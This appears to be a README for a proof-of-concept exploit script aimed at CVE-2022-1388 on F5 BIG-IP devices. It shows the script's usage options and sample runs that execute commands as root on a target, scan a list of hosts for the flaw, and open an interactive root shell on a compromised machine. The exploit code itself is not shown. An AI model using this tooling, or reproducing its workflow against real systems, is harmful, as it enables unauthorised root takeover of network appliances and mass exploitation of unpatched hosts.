PoC for exploiting CVE-2022-1388 on F5 BIG-IP
$ python3 refresh.py -h
usage: refresh.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  -s SH, --shell SH     url to connect
$ python3 refresh.py -u IP -c id
::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: ::: :::
:+: :+::+: :+: :+: :+::+: :+: :+::+: :+:
+:+ +:++:+ +:+ +:+ +:++:+ +:+ +:+ +:+
+#++:++#: +#++:++# :#::+::# +#++:++#: +#++:++# +#++:++#+++#++:++#++
+#+ +#++#+ +#+ +#+ +#++#+ +#++#+ +#+
#+# #+##+# #+# #+# #+##+# #+# #+##+# #+#
### ################ ### ##################### ### ###
</coded by Luchoane>
[++++++] VULNERABLE: xxx.xxx.xxx.xxx | uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
$ python3 refresh.py -f list.txt -c id
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
[++++++] VULNERABLE: xxx.xxx.xxx.xxx | uid=0(root) gid=0(root) context=system_u:system_r:init_t
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
--------------------------
Vulnerable targets scanned:
[+] xxx.xxx.xxx.xxx
$ python3 refresh.py -s xxx.xxx.xxx.xxx
Welcome to the interactive shell for: xxx.xxx.xxx.xxx
User: root
> ping -c 1 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.027 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.027/0.027/0.027/0.000 ms
>